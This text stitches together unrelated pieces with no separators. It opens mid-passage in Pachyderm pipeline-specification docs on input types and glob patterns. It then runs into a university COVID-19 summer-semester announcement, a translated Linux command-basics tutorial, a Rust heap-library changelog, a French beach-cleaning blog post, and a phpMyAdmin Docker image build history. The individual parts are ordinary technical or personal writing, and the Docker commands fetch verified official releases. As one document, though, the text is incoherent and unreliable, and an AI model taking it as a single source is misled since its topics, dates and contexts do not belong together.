`/pfs/inputA/...` or `/pfs/inputB/...`, but never both at the same time.
This can be annoying to write code for since the first thing your code
needs to do is figure out which input directory is present. As of 1.5.3
the recommended way to fix this is to give your inputs the same `Name`,
that way your code only needs to handle data being present in that
directory. This, of course, only works if your code doesn't need to be
aware of which of the underlying inputs the data comes from.
`input.union` is an array of inputs to union, note that these need not be
`atom` inputs, they can also be `union` and `cross` inputs. Although there's no
reason to take a union of unions since union is associative.
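For example, a sketch of a union of two atom inputs that deliberately share the same name (the repo names here are made up):

```json
"input": {
  "union": [
    {"atom": {"name": "in", "repo": "repoA", "glob": "/*"}},
    {"atom": {"name": "in", "repo": "repoB", "glob": "/*"}}
  ]
}
```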
#### Cross Input
Cross inputs take the cross product of other inputs, in other words it creates
tuples of the datums in the inputs. For example:
```
| inputA | inputB | inputA ⨯ inputB |
| ------ | ------ | --------------- |
| foo | fizz | (foo, fizz) |
| bar | buzz | (foo, buzz) |
| | | (bar, fizz) |
| | | (bar, buzz) |
```
Notice that cross inputs do not take a name and maintain the names of the sub-inputs.
In the above example you would see files under `/pfs/inputA/...` and `/pfs/inputB/...`.
`input.cross` is an array of inputs to cross, note that these need not be
`atom` inputs, they can also be `union` and `cross` inputs. Although there's no
reason to take a cross of crosses since cross products are associative.
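For example, a sketch of a cross of two atom inputs (the repo names are made up; the names must be unique because the inputs are crossed):

```json
"input": {
  "cross": [
    {"atom": {"name": "images", "repo": "images", "glob": "/*"}},
    {"atom": {"name": "model", "repo": "model", "glob": "/"}}
  ]
}
```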
#### Cron Input
Cron inputs allow you to trigger pipelines based on time. It's based on the
unix utility `cron`. When you create a pipeline with one or more Cron Inputs
pachd will create a repo for each of them. When a cron input triggers,
that is when the present time satisfies its spec, pachd will commit
a single file, called "time" to the repo which contains the time which
satisfied the spec. The time is formatted according to [RFC
3339](https://www.ietf.org/rfc/rfc3339.txt).
```
{
"name": string,
"spec": string,
"repo": string,
"start": time,
}
```
`input.cron.name` is the name for the input, its semantics are similar to
those of `input.atom.name`. Except that it's not optional.
`input.cron.spec` is a cron expression which specifies the schedule on
which to trigger the pipeline. To learn more about how to write schedules
see the [Wikipedia page on cron](https://en.wikipedia.org/wiki/Cron).
Pachyderm supports Nonstandard schedules such as `"@daily"`.
`input.cron.repo` is the repo which will be created for the input. It is
optional, if it's not specified then `"<pipeline-name>_<input-name>"` will
be used.
`input.cron.start` is the time to start counting from for the input. It is
optional, if it's not specified then the present time (when the pipeline
is created) will be used. Specifying a time allows you to run on matching
times from the past or, skip times from the present and only start running
on matching times in the future. Times should be formatted according to [RFC
3339](https://www.ietf.org/rfc/rfc3339.txt).
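For example, a hypothetical cron input that triggers the pipeline once a day, letting `repo` and `start` take their defaults:

```json
"input": {
  "cron": {
    "name": "tick",
    "spec": "@daily"
  }
}
```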
#### Git Input (alpha feature)
Git inputs allow you to pull code from a public git URL and execute that code as part of your pipeline. A pipeline with a Git Input will get triggered (i.e. will see a new input commit and will spawn a job) whenever you commit to your git repository.
**Note:** This only works on cloud deployments, not local clusters.
`input.git.URL` must be a URL of the form: `https://github.com/foo/bar.git`
`input.git.name` is the name for the input, its semantics are similar to
those of `input.atom.name`. It is optional.
`input.git.branch` is the name of the git branch to use as input
Git inputs also require some additional configuration. In order for new commits on your git repository to correspond to new commits on the Pachyderm Git Input repo, we need to setup a git webhook. At the moment, only GitHub is supported. (Though if you ask nicely, we can add support for GitLab or BitBucket).
1. Create your Pachyderm pipeline with the Git Input.
2. To get the URL of the webhook to your cluster, do `pachctl inspect-pipeline` on your pipeline. You should see a `Githook URL` field with a URL set. Note - this will only work if you've deployed to a cloud provider (e.g. AWS, GKE). If you see `pending` as the value (and you've deployed on a cloud provider), it's possible that the service is still being provisioned. You can check `kubectl get svc` to make sure you see the `githook` service running.
3. To setup the GitHub webhook, navigate to:
```
https://github.com/<your_org>/<your_repo>/settings/hooks/new
```
Or navigate to webhooks under settings. Then you'll want to copy the `Githook URL` into the 'Payload URL' field.
### Output Branch (optional)
This is the branch where the pipeline outputs new commits. By default,
it's "master".
### Egress (optional)
`egress` allows you to push the results of a Pipeline to an external data
store such as s3, Google Cloud Storage or Azure Storage. Data will be pushed
after the user code has finished running but before the job is marked as
successful.
### Standby (optional)
`standby` indicates that the pipeline should be put into "standby" when there's
no data for it to process. A pipeline in standby will have no pods running and
thus will consume no resources, it's state will be displayed as "standby".
Standby replaces `scale_down_threshold` from releases prior to 1.7.1.
### Incremental (optional)
Incremental, if set will cause the pipeline to be run "incrementally". This
means that when a datum changes it won't be reprocessed from scratch, instead
`/pfs/out` will be populated with the previous results of processing that datum
and instead of seeing the full datum under `/pfs/repo` you will see only
new/modified values. Incremental pipelines are discussed in more detail [here](../fundamentals/incrementality.html).
Incremental processing is useful for [online
algorithms](https://en.wikipedia.org/wiki/Online_algorithm), a canonical
example is summing a set of numbers since the new numbers can be added to the
old total without having to reconsider the numbers which went into that old
total. Incremental is designed to work nicely with the `--split` flag to
`put-file` because it will cause only the new chunks of the file to be
displayed to each step of the pipeline.
### Cache Size (optional)
`cache_size` controls how much cache a pipeline worker uses. In general,
your pipeline's performance will increase with the cache size, but only
up to a certain point depending on your workload.
### Enable Stats (optional)
`enable_stats` turns on stat tracking for the pipeline. This will cause the
pipeline to commit to a second branch in its output repo called `"stats"`. This
branch will have information about each datum that is processed including:
timing information, size information, logs and a `/pfs` snapshot. This
information can be accessed through the `inspect-datum` and `list-datum`
pachctl commands and through the webUI.
Note: enabling stats will use extra storage for logs and timing information.
However it will not use as much extra storage as it appears to due to the fact
that snapshots of the `/pfs` directory, which are generally the largest thing
stored, don't actually require extra storage because the data is already stored
in the input repos.
### Service (alpha feature, optional)
`service` specifies that the pipeline should be treated as a long running
service rather than a data transformation. This means that `transform.cmd` is
not expected to exit, if it does it will be restarted. Furthermore, the service
will be exposed outside the container using a kubernetes service.
`"internal_port"` should be a port that the user code binds to inside the
container, `"external_port"` is the port on which it is exposed, via the
NodePorts functionality of kubernetes services. After a service has been
created you should be able to access it at
`http://<kubernetes-host>:<external_port>`.
### Max Queue Size (optional)
`max_queue_size` specifies that maximum number of elements that a worker should
hold in its processing queue at a given time. The default value is `1` which
means workers will only hold onto the value that they're currently processing.
Increasing this value can improve pipeline performance as it allows workers to
simultaneously download, process and upload different datums at the same time.
Setting this value too high can cause problems if you have `lazy` inputs as
there's a cap of 10,000 `lazy` files per worker and multiple datums that are
running all count against this limit.
### Chunk Spec (optional)
`chunk_spec` specifies how a pipeline should chunk its datums.
`chunk_spec.number` if nonzero, specifies that each chunk should contain `number`
datums. Chunks may contain fewer if the total number of datums don't
divide evenly.
`chunk_spec.size_bytes` , if nonzero, specifies a target size for each chunk of datums.
Chunks may be larger or smaller than `size_bytes`, but will usually be
pretty close to `size_bytes` in size.
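For example, to aim for chunks of roughly 10MB each (an illustrative value):

```json
"chunk_spec": {
  "size_bytes": 10485760
}
```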
## The Input Glob Pattern
Each atom input needs to specify a [glob pattern](../fundamentals/distributed_computing.html).
Pachyderm uses the glob pattern to determine how many "datums" an input
consists of. Datums are the unit of parallelism in Pachyderm. That is,
Pachyderm attempts to process datums in parallel whenever possible.
Intuitively, you may think of the input repo as a file system, and you are
applying the glob pattern to the root of the file system. The files and
directories that match the glob pattern are considered datums.
For instance, let's say your input repo has the following structure:
```
/foo-1
/foo-2
/bar
/bar-1
/bar-2
```
Now let's consider what the following glob patterns would match respectively:
* `/`: this pattern matches `/`, the root directory itself, meaning all the data would be a single large datum.
* `/*`: this pattern matches everything under the root directory given us 3 datums:
`/foo-1.`, `/foo-2.`, and everything under the directory `/bar`.
* `/bar/*`: this pattern matches files only under the `/bar` directory: `/bar-1` and `/bar-2`
* `/foo*`: this pattern matches files under the root directory that start with the characters `foo`
* `/*/*`: this pattern matches everything that's two levels deep relative
to the root: `/bar/bar-1` and `/bar/bar-2`
The datums are defined as whichever files or directories match by the glob pattern. For instance, if we used
`/*`, then the job will process three datums (potentially in parallel):
`/foo-1`, `/foo-2`, and `/bar`. Both the `bar-1` and `bar-2` files within the directory `bar` would be grouped together and always processed by the same worker.
## Multiple Inputs
It's important to note that if a pipeline takes multiple atom inputs (via cross
or union) then the pipeline will not get triggered until all of the atom inputs
have at least one commit on the branch.
## PPS Mounts and File Access
### Mount Paths
The root mount point is at `/pfs`, which contains:
- `/pfs/input_name` which is where you would find the datum.
- Each input will be found here by its name, which defaults to the repo
name if not specified.
- `/pfs/out` which is where you write any output.
### Output Formats
PFS supports data to be delimited by line, JSON, or binary blobs.
---
title: COVID-19 (Coronavirus)
subtitle:
date: 2020-04-08
link: >-
https://covid19.rpi.edu/announcements/summer-semester
countryCode: us
status: published
instituteSlug: us-rpi
---

Even as we approach the final weeks of instruction for the spring semester, planning is in full swing for the summer semester. With an emphasis on protecting the health and safety of our community, and reducing the risk from COVID-19 disease, President Jackson announced that instruction for the summer semester, including Arch classes, will be delivered remotely.
To support students throughout the Arch summer semester, as well as any students taking online courses with us, Rensselaer student and academic services will be fully operational including the Advising and Learning Assistance Center (ALAC), Student Success, and Class Deans.
The Center for Career and Professional Development (CCPD) will continue to provide comprehensive and individualized services to assist all students with their searches for away semester opportunities, co-ops, internships, and full-time jobs. Students enrolled in the Arch Preparation Course should complete all assignments; the course outcomes are critical for success in securing semester away opportunities. To connect with the Career Counselor for a specific school, students may schedule an appointment on Joblink. Students may also utilize the “Chat with an Advisor” feature on the JobLink main page for on-demand assistance between 8 a.m. and 5 p.m. (EST), Monday through Friday, or email the CCPD.
In addition to information on the summer semester, we also want to provide additional information on a question that many of you have raised about adjustments to room and board charges for the spring 2020 semester. The Institute will be providing pro-rata room and board credits, net of Rensselaer financial aid. Credits will be posted in the coming weeks. Additional information on this topic will be available on the COVID-19 website.
We look forward to continuing to support you throughout the rest of the spring term and beyond. Please be well and continue to take the recommended steps to keep yourselves and our community safe and healthy.
---
title: "[Linux 03] 리눅스 명령어 기초(2) - 파일과 디렉토리"
date: 2020-07-07
categories:
- blog
tags:
- Linux
comments: true
excerpt: Linux command basics (2)
last_modified_at: 2020-07-07
toc: true
---
## Files and Directories

### 1. File Basics

#### (1) Working with Files and Directories

#### 1) Directories and Absolute/Relative Paths

a) Absolute path

- The full path from the root directory down to the directory where the file is located
- e.g. /home/user/test/hello.txt

b) Relative path

- The path to a file's directory written relative to the current location in the command shell
- The current location is expressed with dots
- The current directory is a single dot '.', and the parent directory is two dots '..'

#### 2) Navigating Files

- pwd : prints the current working directory
- cd : changes the current working directory
- ls : lists the files in a directory

#### 3) Viewing File Contents

- cat filename : prints the whole contents of the file filename at once
- more : used together with a pipe (\|) to display output one screen at a time
- page filename : displays the file filename one screen at a time
- head
  - shows a file's contents starting from the beginning
  - head -n filename : displays the first n lines of the file
- tail
  - shows a file's contents starting from the end
  - tail -n filename : displays the last n lines of the file
  - tail -f filename : continuously displays the end of a file that is still being written to
#### 4) Manipulating Files

- mv
  - command for moving files
  - mv oldfilename newfilename : renames oldfile to newfile
  - mv filename dirName : moves the file into the given directory
  - mv oldDirName newDirName : creates a directory named newDir and moves all files of oldDir into it
- cp
  - command for copying files
  - cp oldfile newfile : copies the contents of oldfile into newfile
  - cp filename dirName : copies the file into the given directory
  - cp oldDirName newDirName : creates a directory named newDir and copies all files of oldDir into it
  - cp -R oldDir newDir : the -R option copies all subdirectories as well
- rm
  - command for deleting files
  - rm filename : deletes the file

#### 5) Command History

- r or ! : recalls previously used commands
- Command history file
  - Every command you have used is stored in a file named '.bash_history' (Linux bash) in that user's home directory.
  - Serves as an evidence file of which user accessed the system with which commands
  - On enterprise systems, this file is sent in real time to a central monitoring server and archived there, in order to watch for access with malicious intent

#### 6) Managing Directories

- mkdir : creates a new directory
- rmdir : deletes the given directory

#### 7) Counting Characters in a File

- wc
  - shows the number of characters and lines inside a file
  - The output order is the file's line count [newline], word count [word], and character count [byte]
### 2. Working with Files

#### (1) File Filters

##### 1) Pipes (|) and the grep Command

- grep
  - searches the input for the given pattern and prints the matching lines.
  - e.g. grep "gh" abc.txt , cat abc.txt\|grep gh
- Main grep options
  - w : print only lines where the whole word matches
  - n : print line numbers
  - v : print lines that do not match
  - l : print the names of the matching files
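For example (the file names are made up for illustration):

```bash
# print the lines of abc.txt that contain "gh", with line numbers
grep -n "gh" abc.txt

# the same search fed through a pipe; -v keeps only non-matching lines
cat abc.txt | grep -v "gh"

# print only the names of the .txt files that contain a match
grep -l "gh" *.txt
```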
##### 2) Redirection

- Used when you want to feed one command's output into another command, or to record a command's output in a file
- Pipe (\|)
  - command1 \| command2 : runs another command on the output of the first command
- Redirection (>, >>)
  - command > filename : creates a new file with the given name and writes the command's output to it
  - command >> filename : appends the command's output to the end of the named file
  - command < filename : uses the named file as the command's input
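A short illustration that combines a pipe with both redirection operators (the file name is made up):

```bash
# count the files in /etc and write the number to a new file
ls /etc | wc -l > count.txt

# append a second count to the same file
ls /tmp | wc -l >> count.txt

# use the file as input to another command
sort < count.txt
```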
#### (2) Comparing, Sorting, and Searching Files

##### 1) Comparing Files

- cmp
  - cmp file1 file2 : command that compares two files
- diff
  - diff file1 file2 : command that shows the differences between two files

##### 2) Sorting Files

- sort
  - sorts a file's contents according to the given sort criteria
  - sort abc.txt : sorts the file in ascending order
  - sort -r abc.txt : sorts the file in descending order
  - sort -k2 abc.txt : sorts using the second field as the key
##### 3) Searching for Files

- find
  - finds the location of files that match the desired conditions
- Main find conditions
  - -name : search by file name or pattern
  - -type : search for files whose file type matches
  - -user : search for files whose owner matches
  - -group : search for files whose group matches
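For example (the paths and user name are made up):

```bash
# find files named *.txt under the current directory
find . -name "*.txt"

# find directories under /home owned by user1
find /home -type d -user user1
```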
#### (3) Archiving and Compressing Files

- tar
  - command for archiving files or unpacking archives
  - tar -cvf tarFilename fileList : to bundle files into an archive
  - tar -xvf tarFilename : to unpack a bundled archive
- gzip/gunzip
  - commands for compressing and decompressing files
  - gzip abc : compresses the file abc, producing abc.gz
  - gunzip abc.gz : decompresses abc.gz, restoring the file abc
# Changelog
All notable changes to this project will be documented in this file.
The format is based on [Keep a Changelog] and this project adheres to
[Semantic Versioning].
[Keep a Changelog]: http://keepachangelog.com/en/1.0.0/
[Semantic Versioning]: http://semver.org/spec/v2.0.0.html
## [Unreleased]
### Fixed
- Documented time complexity of `push` to be worst-case linear and amortized
logarithmic.
## [1.2.0] - 2018-06-02
### Added
- Two new iterator types, `DrainAsc` and `DrainDesc`, and two new methods
for creating them, `MinMaxHeap::drain_asc` and `MinMaxHeap::drain_desc`.
These iterators drain the heap in ascending (min-first) or descending
(max-first) order, respectively.
- Implementations of `Iterator::size_hint` for `Drain`, `IntoIter`, and
`Iter` iterator types.
## [1.1.1] - 2018-05-30
### Added
- `#[doc(html_base_url = ...)]` annotation in crate root.
## [1.1.0] - 2018-05-12
### Added
- Optional serde support. Enable `"serde"` Cargo feature to get impls
of `Serializable` and `Deserializable` for `MinMaxHeap`.
- Documented oldest supported rustc version: 1.20.
## [1.0.4] - 2018-05-04
### Changed
- Uses `ManuallyDrop` instead of `Option` in internal `Hole`
implementation. (Thanks to Nikita Popov.)
## [1.0.3] - 2018-05-03
### Added
- Some simple benchmarks.
### Changed
- Internal `is_min_level` function uses `leading_zeros` instead of an
*O*(log *n*)–time loop.
## [1.0.2] - 2018-04-01
### Fixed
- Documentation URL.
## [1.0.1] - 2018-03-31
### Removed
- Dependency on Clippy. Use `cargo +nightly clippy` instead.
## [1.0.0] - 2018-03-31
### Added
- Automatic code coverage checking on codecov.io.
## [0.2.1] - 2016-06-13
### Fixed
- Bad crate metadata.
## [0.2.0] - 2016-06-13
### Added
- `MinMaxHeap::into_vec_asc` and `MinMaxHeap::into_vec_desc` methods.
- Impl of `From<Vec<T>>` for `MinMaxHeap<T>`.
## [0.1.2] - 2016-06-13
### Removed
- Clippy warnings.
## [0.1.1] - 2016-06-12
### Added
- Mentioned `crates.io` in docs.
## [0.1.0] - 2016-06-12
Initial release
---
title: "Juste deux minutes"
subtitle: "Des plages, des habitudes et des sourires"
date: 2019-05-04T15:38:06+02:00
draft: false
description: "Ce sont les petits gestes qui comptent pour aider l'humain. Deux minutes suffisent. Nettoyons les plages"
tags:
[
"environement",
"plage",
"nettoyage",
"ecologie",
"leave no trace",
"volontariat",
"petits gestes",
]
categories:
- journal
- activism
slug: "juste-deux-minutes"
emoji: "🌍"
resources:
- src: "*.webp"
- src: "cover.webp"
name: "cover"
summary: "Ce sont les petits gestes qui comptent pour aider l'humain à avancer. Il en faut des gros, c'est sur. Mais il nous faut aussi des petits gestes. Comme disait la compagnie Créole, c'est bon pour le moral. Et vous savez ce qui aide le plus à avancer? Positiver. Les émotions sont contagieuses et je préfère en partager des positives que des négatives lorsqu'on en vient à notre planète."
---
Ce sont les petits gestes qui comptent pour aider l'humain à avancer. Il en faut des gros, c'est sur. Mais il nous faut aussi des petits gestes. Comme disait la compagnie Créole, c'est bon pour le moral. Et vous savez ce qui aide le plus à avancer? Positiver. Les émotions sont contagieuses et je préfère en partager des positives que des négatives lorsqu'on en vient à notre planète.
Alors, on apprend les petits gestes à Tom. Il a besoin de comprendre que la terre va mal, et que c'est de notre faute. Il a aussi besoin de savoir, déjà à cinq ans, qu'il peut avoir un impact positif sur notre belle planète.
Un des petits gestes qu'on a pris comme habitude, c'est de nettoyer les plages. Il suffit de [deux minutes](https://beachclean.net) pour aider nos plages. Plus c'est mieux mais déjà deux minutes suffisent a la rendre plus belle. On a toujours un distributeur de sacs dans notre sac à dos. Un truc en plastique offert par [AS Adventure](https://www.asadventure.com/) qui nous permet de faire des petits sacs poubelles. Du plastique pour enlever le plastique, un peu ironique mais au final, ça marche pas mal. Et dès que l'on voit des déchets, on les ramasse, les stocke et les jette une fois la balade finie. Il y a bien sur aussi les [bacs à marée](https://bacamaree.fr) qui poussent un peu partout en Bretagne et ailleurs. N'hésitez pas à y ramener les bouts de cordes et autres detritus que vous trouvez. Gardez les vôtres, dans vos sacs, et jetez les dans une poubelle une fois la sortie finie. Cela ne demande pas de gros efforts. Si on prenaient tous ces deux minutes et si on réfléchissait avant de jeter quelque chose sur la plage, on y serait encore mieux.
Si vous voulez aussi aider nos océans et plages, n'hésitez pas à aller faire un tour sur le site de [Surfrider](https://www.surfrider.eu) ou [Surfers Against Sewage](https://www.sas.org.uk/). N'hésitez pas à faire des dons ou à donner de votre personne. Votre temps est votre don le plus précieux. La Terre vous dit merci. Et Tom aussi.
{{< photo src="1.webp" alt="Tom doesn't like litter" class="vertical" >}}
## `phpmyadmin:fpm`
```console
$ docker pull phpmyadmin@sha256:9a028739fb4cb6b63f7e42c485ee34243e679f8bf2884da09ade1346d326bcc6
```
- Manifest MIME: `application/vnd.docker.distribution.manifest.list.v2+json`
- Platforms:
- linux; amd64
- linux; arm variant v5
- linux; arm variant v7
- linux; arm64 variant v8
- linux; 386
- linux; mips64le
- linux; ppc64le
- linux; s390x
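
The digest in the `docker pull` command above names the manifest list as a whole; each platform bullet resolves to its own image manifest, whose digest appears in the matching section below. As a quick sketch (assuming a Docker CLI recent enough to ship the `manifest` subcommand, which was experimental in older releases), the mapping can be inspected locally, or a single platform pulled explicitly:

```console
$ # list the per-platform digests behind the manifest list
$ docker manifest inspect phpmyadmin:fpm
$ # or pull one specific platform instead of letting the daemon choose
$ docker pull --platform linux/arm64 phpmyadmin:fpm
```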
### `phpmyadmin:fpm` - linux; amd64
```console
$ docker pull phpmyadmin@sha256:e72d40cf549f0df6e0879594970a24c09785c2043c50b9f10d0ae86a4134149a
```
- Docker Version: 19.03.12
- Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json`
- Total Size: **160.0 MB (160004977 bytes)**
(compressed transfer size, not on-disk size)
- Image ID: `sha256:3accfc160a42d0f7f86c7979613807111ef72caa358bcd73bcfe0874571fc551`
- Entrypoint: `["\/docker-entrypoint.sh"]`
- Default Command: `["php-fpm"]`
```dockerfile
# Tue, 30 Mar 2021 21:49:29 GMT
ADD file:b797b4d60ad7954e98ad71574c4fc90ad3da9a5c250112373e92e2af3056e581 in /
# Tue, 30 Mar 2021 21:49:30 GMT
CMD ["bash"]
# Wed, 31 Mar 2021 09:51:10 GMT
RUN set -eux; { echo 'Package: php*'; echo 'Pin: release *'; echo 'Pin-Priority: -1'; } > /etc/apt/preferences.d/no-debian-php
# Wed, 31 Mar 2021 09:51:10 GMT
ENV PHPIZE_DEPS=autoconf dpkg-dev file g++ gcc libc-dev make pkg-config re2c
# Wed, 31 Mar 2021 09:51:48 GMT
RUN set -eux; apt-get update; apt-get install -y --no-install-recommends $PHPIZE_DEPS ca-certificates curl xz-utils ; rm -rf /var/lib/apt/lists/*
# Wed, 31 Mar 2021 09:51:49 GMT
ENV PHP_INI_DIR=/usr/local/etc/php
# Wed, 31 Mar 2021 09:51:51 GMT
RUN set -eux; mkdir -p "$PHP_INI_DIR/conf.d"; [ ! -d /var/www/html ]; mkdir -p /var/www/html; chown www-data:www-data /var/www/html; chmod 777 /var/www/html
# Wed, 31 Mar 2021 10:04:18 GMT
ENV PHP_EXTRA_CONFIGURE_ARGS=--enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data --disable-cgi
# Wed, 31 Mar 2021 10:04:18 GMT
ENV PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
# Wed, 31 Mar 2021 10:04:18 GMT
ENV PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
# Wed, 31 Mar 2021 10:04:18 GMT
ENV PHP_LDFLAGS=-Wl,-O1 -pie
# Wed, 31 Mar 2021 10:24:38 GMT
ENV GPG_KEYS=42670A7FE4D0441C8E4632349E4FDC074A4EF02D 5A52880781F755608BF815FC910DEB46F53EA312
# Wed, 31 Mar 2021 10:24:39 GMT
ENV PHP_VERSION=7.4.16
# Wed, 31 Mar 2021 10:24:39 GMT
ENV PHP_URL=https://www.php.net/distributions/php-7.4.16.tar.xz PHP_ASC_URL=https://www.php.net/distributions/php-7.4.16.tar.xz.asc
# Wed, 31 Mar 2021 10:24:39 GMT
ENV PHP_SHA256=1c16cefaf88ded4c92eed6a8a41eb682bb2ef42429deb55f1c4ba159053fb98b
# Wed, 31 Mar 2021 10:24:49 GMT
RUN set -eux; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends gnupg dirmngr; rm -rf /var/lib/apt/lists/*; mkdir -p /usr/src; cd /usr/src; curl -fsSL -o php.tar.xz "$PHP_URL"; if [ -n "$PHP_SHA256" ]; then echo "$PHP_SHA256 *php.tar.xz" | sha256sum -c -; fi; if [ -n "$PHP_ASC_URL" ]; then curl -fsSL -o php.tar.xz.asc "$PHP_ASC_URL"; export GNUPGHOME="$(mktemp -d)"; for key in $GPG_KEYS; do gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$key"; done; gpg --batch --verify php.tar.xz.asc php.tar.xz; gpgconf --kill all; rm -rf "$GNUPGHOME"; fi; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark > /dev/null; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false
# Wed, 31 Mar 2021 10:24:49 GMT
COPY file:ce57c04b70896f77cc11eb2766417d8a1240fcffe5bba92179ec78c458844110 in /usr/local/bin/
# Wed, 31 Mar 2021 10:30:57 GMT
RUN set -eux; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends libargon2-dev libcurl4-openssl-dev libedit-dev libonig-dev libsodium-dev libsqlite3-dev libssl-dev libxml2-dev zlib1g-dev ${PHP_EXTRA_BUILD_DEPS:-} ; rm -rf /var/lib/apt/lists/*; export CFLAGS="$PHP_CFLAGS" CPPFLAGS="$PHP_CPPFLAGS" LDFLAGS="$PHP_LDFLAGS" ; docker-php-source extract; cd /usr/src/php; gnuArch="$(dpkg-architecture --query DEB_BUILD_GNU_TYPE)"; debMultiarch="$(dpkg-architecture --query DEB_BUILD_MULTIARCH)"; if [ ! -d /usr/include/curl ]; then ln -sT "/usr/include/$debMultiarch/curl" /usr/local/include/curl; fi; ./configure --build="$gnuArch" --with-config-file-path="$PHP_INI_DIR" --with-config-file-scan-dir="$PHP_INI_DIR/conf.d" --enable-option-checking=fatal --with-mhash --with-pic --enable-ftp --enable-mbstring --enable-mysqlnd --with-password-argon2 --with-sodium=shared --with-pdo-sqlite=/usr --with-sqlite3=/usr --with-curl --with-libedit --with-openssl --with-zlib --with-pear $(test "$gnuArch" = 's390x-linux-gnu' && echo '--without-pcre-jit') --with-libdir="lib/$debMultiarch" ${PHP_EXTRA_CONFIGURE_ARGS:-} ; make -j "$(nproc)"; find -type f -name '*.a' -delete; make install; find /usr/local/bin /usr/local/sbin -type f -executable -exec strip --strip-all '{}' + || true; make clean; cp -v php.ini-* "$PHP_INI_DIR/"; cd /; docker-php-source delete; apt-mark auto '.*' > /dev/null; [ -z "$savedAptMark" ] || apt-mark manual $savedAptMark; find /usr/local -type f -executable -exec ldd '{}' ';' | awk '/=>/ { print $(NF-1) }' | sort -u | xargs -r dpkg-query --search | cut -d: -f1 | sort -u | xargs -r apt-mark manual ; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; pecl update-channels; rm -rf /tmp/pear ~/.pearrc; php --version
# Wed, 31 Mar 2021 10:30:58 GMT
COPY multi:6dfba8f7e64bd54e4d9aa0855ff6ce7a53059e0a733752b4537fd3fdfd32d837 in /usr/local/bin/
# Wed, 31 Mar 2021 10:30:59 GMT
RUN docker-php-ext-enable sodium
# Wed, 31 Mar 2021 10:30:59 GMT
ENTRYPOINT ["docker-php-entrypoint"]
# Wed, 31 Mar 2021 10:30:59 GMT
WORKDIR /var/www/html
# Wed, 31 Mar 2021 10:31:00 GMT
RUN set -eux; cd /usr/local/etc; if [ -d php-fpm.d ]; then sed 's!=NONE/!=!g' php-fpm.conf.default | tee php-fpm.conf > /dev/null; cp php-fpm.d/www.conf.default php-fpm.d/www.conf; else mkdir php-fpm.d; cp php-fpm.conf.default php-fpm.d/www.conf; { echo '[global]'; echo 'include=etc/php-fpm.d/*.conf'; } | tee php-fpm.conf; fi; { echo '[global]'; echo 'error_log = /proc/self/fd/2'; echo; echo '; https://github.com/docker-library/php/pull/725#issuecomment-443540114'; echo 'log_limit = 8192'; echo; echo '[www]'; echo '; if we send this to /proc/self/fd/1, it never appears'; echo 'access.log = /proc/self/fd/2'; echo; echo 'clear_env = no'; echo; echo '; Ensure worker stdout and stderr are sent to the main error log.'; echo 'catch_workers_output = yes'; echo 'decorate_workers_output = no'; } | tee php-fpm.d/docker.conf; { echo '[global]'; echo 'daemonize = no'; echo; echo '[www]'; echo 'listen = 9000'; } | tee php-fpm.d/zz-docker.conf
# Wed, 31 Mar 2021 10:31:00 GMT
STOPSIGNAL SIGQUIT
# Wed, 31 Mar 2021 10:31:00 GMT
EXPOSE 9000
# Wed, 31 Mar 2021 10:31:00 GMT
CMD ["php-fpm"]
# Thu, 01 Apr 2021 08:17:57 GMT
RUN set -ex; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends libbz2-dev libfreetype6-dev libjpeg-dev libpng-dev libwebp-dev libxpm-dev libzip-dev ; docker-php-ext-configure gd --with-freetype --with-jpeg --with-webp --with-xpm; docker-php-ext-install -j "$(nproc)" bz2 gd mysqli opcache zip ; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark; ldd "$(php -r 'echo ini_get("extension_dir");')"/*.so | awk '/=>/ { print $3 }' | sort -u | xargs -r dpkg-query -S | cut -d: -f1 | sort -u | xargs -rt apt-mark manual; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; rm -rf /var/lib/apt/lists/*
# Thu, 01 Apr 2021 08:17:57 GMT
ENV MAX_EXECUTION_TIME=600
# Thu, 01 Apr 2021 08:17:57 GMT
ENV MEMORY_LIMIT=512M
# Thu, 01 Apr 2021 08:17:58 GMT
ENV UPLOAD_LIMIT=2048K
# Thu, 01 Apr 2021 08:17:59 GMT
RUN set -ex; { echo 'opcache.memory_consumption=128'; echo 'opcache.interned_strings_buffer=8'; echo 'opcache.max_accelerated_files=4000'; echo 'opcache.revalidate_freq=2'; echo 'opcache.fast_shutdown=1'; } > $PHP_INI_DIR/conf.d/opcache-recommended.ini; { echo 'session.cookie_httponly=1'; echo 'session.use_strict_mode=1'; } > $PHP_INI_DIR/conf.d/session-strict.ini; { echo 'allow_url_fopen=Off'; echo 'max_execution_time=${MAX_EXECUTION_TIME}'; echo 'max_input_vars=10000'; echo 'memory_limit=${MEMORY_LIMIT}'; echo 'post_max_size=${UPLOAD_LIMIT}'; echo 'upload_max_filesize=${UPLOAD_LIMIT}'; } > $PHP_INI_DIR/conf.d/phpmyadmin-misc.ini
# Thu, 01 Apr 2021 08:17:59 GMT
ENV VERSION=5.1.0
# Thu, 01 Apr 2021 08:17:59 GMT
ENV SHA256=aa8ccf357f672012384df34e1c2bc70147476761c8458a0dad6233497e142c68
# Thu, 01 Apr 2021 08:17:59 GMT
ENV URL=https://files.phpmyadmin.net/phpMyAdmin/5.1.0/phpMyAdmin-5.1.0-all-languages.tar.xz
# Thu, 01 Apr 2021 08:18:00 GMT
LABEL org.opencontainers.image.title=Official phpMyAdmin Docker image org.opencontainers.image.description=Run phpMyAdmin with Alpine, Apache and PHP FPM. org.opencontainers.image.authors=The phpMyAdmin Team <[email protected]> org.opencontainers.image.vendor=phpMyAdmin org.opencontainers.image.documentation=https://github.com/phpmyadmin/docker#readme org.opencontainers.image.licenses=GPL-2.0-only org.opencontainers.image.version=5.1.0 org.opencontainers.image.url=https://github.com/phpmyadmin/docker#readme org.opencontainers.image.source=https://github.com/phpmyadmin/docker.git
